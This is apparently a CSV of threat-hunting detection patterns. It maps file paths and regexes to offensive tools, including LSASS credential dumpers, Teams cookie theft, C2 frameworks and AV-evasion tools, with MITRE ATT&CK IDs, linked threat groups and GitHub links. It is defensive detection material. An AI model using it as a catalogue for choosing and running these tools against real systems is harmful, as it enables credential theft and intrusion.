"*\TakeMyRDP.pdb*",".{0,1000}\\TakeMyRDP\.pdb.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19222"
"*\TaoWu.cna*",".{0,1000}\\TaoWu\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19223"
"*\Tasks\bypass-clm*",".{0,1000}\\Tasks\\bypass\-clm.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","19226"
"*\Tasks\lsass.dmp*",".{0,1000}\\Tasks\\lsass\.dmp.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","19227"
"*\TASKSHELL.EXE*",".{0,1000}\\TASKSHELL\.EXE.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","N/A","10","10","56","9","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z","19229"
"*\Tater.ps1*",".{0,1000}\\Tater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","19230"
"*\TChopper\chopper.*",".{0,1000}\\TChopper\\chopper\..{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","19238"
"*\Tchopper-main.zip*",".{0,1000}\\Tchopper\-main\.zip.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","19239"
"*\tcp_keylogger.rs*",".{0,1000}\\tcp_keylogger\.rs.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","19240"
"*\TCPMITM.py*",".{0,1000}\\TCPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","19241"
"*\TeamFiltration.dll*",".{0,1000}\\TeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19250"
"*\TeamFiltration.exe*",".{0,1000}\\TeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19251"
"*\TeamFiltration\OneDriveAPI*",".{0,1000}\\TeamFiltration\\OneDriveAPI.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19252"
"*\TeamFiltration\TeamFiltration\*",".{0,1000}\\TeamFiltration\\TeamFiltration\\.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19253"
"*\TeamFiltrationConfig_Example.json*",".{0,1000}\\TeamFiltrationConfig_Example\.json.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","19254"
"*\teams_dump.py*",".{0,1000}\\teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","19255"
"*\teams_dump.py*",".{0,1000}\\teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","19256"
"*\teams_localdb.py*",".{0,1000}\\teams_localdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19257"
"*\teamsenum.py*",".{0,1000}\\teamsenum\.py.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","19258"
"*\TeamServer_win.exe*",".{0,1000}\\TeamServer_win\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","19259"
"*\teamserver-win.zip*",".{0,1000}\\teamserver\-win\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","19260"
"*\teamstracker.py*",".{0,1000}\\teamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","19261"
"*\Temp\blah.exe*",".{0,1000}\s\\Temp\\blah\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","19277"
"*\Temp\cme_hosted*",".{0,1000}\\Temp\\cme_hosted.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0001 - TA0002 - TA0007 - TA0008","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","19279"
"*\Temp\csrss.dmp*",".{0,1000}\\Temp\\csrss\.dmp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","19281"
"*\temp\dump.txt*",".{0,1000}\\temp\\dump\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19283"
"*\Temp\dumpert*",".{0,1000}\\Temp\\dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","19284"
"*\Temp\dumpert.dmp*",".{0,1000}\\Temp\\dumpert\.dmp.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","19285"
"*\temp\ft.exe*",".{0,1000}\\temp\\ft\.exe.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","19287"
"*\temp\hollow.dll*",".{0,1000}\\temp\\hollow\.dll.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","19288"
"*\Temp\Impersonate.exe*",".{0,1000}\\Temp\\Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","19289"
"*\temp\Injected.dll*",".{0,1000}\\temp\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","19290"
"*\Temp\lsass.dmp*",".{0,1000}\\Temp\\lsass\.dmp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","19292"
"*\temp\lsass.exe*",".{0,1000}\\temp\\lsass\.exe.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","19293"
"*\Temp\nxc_hosted*",".{0,1000}\\Temp\\nxc_hosted.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19294"
"*\temp\OpenFileShares.txt*",".{0,1000}\\temp\\OpenFileShares\.txt.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open files shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","0","N/A","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","19295"
"*\temp\pwned.trx*",".{0,1000}\\temp\\pwned\.trx.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19296"
"*\Temp\Reaper.exe*",".{0,1000}\\Temp\\Reaper\.exe.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","19297"
"*\Temp\RTCore64.sys*",".{0,1000}\\Temp\\RTCore64\.sys.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","19298"
"*\Temp\tor\control-port-*",".{0,1000}\\Temp\\tor\\control\-port\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19302"
"*\Temp\tor\torrc-*",".{0,1000}\\Temp\\tor\\torrc\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","19303"
"*\temp\trick.zip*.json*",".{0,1000}\\temp\\trick\.zip.{0,1000}\.json.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","19304"
"*\Temp\Wdlogfile.log*",".{0,1000}\\Temp\\Wdlogfile\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19305"
"*\Temp\whoami.txt*",".{0,1000}\\Temp\\whoami\.txt.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0001 - TA0002 - TA0007 - TA0008","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","19306"
"*\Temp\whoami.txt*",".{0,1000}\\Temp\\whoami\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19307"
"*\Temp\WinAuditDB.accdb*",".{0,1000}\\Temp\\WinAuditDB\.accdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19308"
"*\Temp\YANRI_TEMP_*",".{0,1000}\\Temp\\YANRI_TEMP_.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","19311"
"*\termsrv.patch.dll*",".{0,1000}\\termsrv\.patch\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","19312"
"*\teslacrypt.txt*",".{0,1000}\\teslacrypt\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19313"
"*\Test.PME",".{0,1000}\\Test\.PME","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","19314"
"*\test_mitm_initialization.py*",".{0,1000}\\test_mitm_initialization\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","19315"
"*\testEnvExit.exe*",".{0,1000}\\testEnvExit\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19318"
"*\TestNetConnectionCommand.cs",".{0,1000}\\TestNetConnectionCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19319"
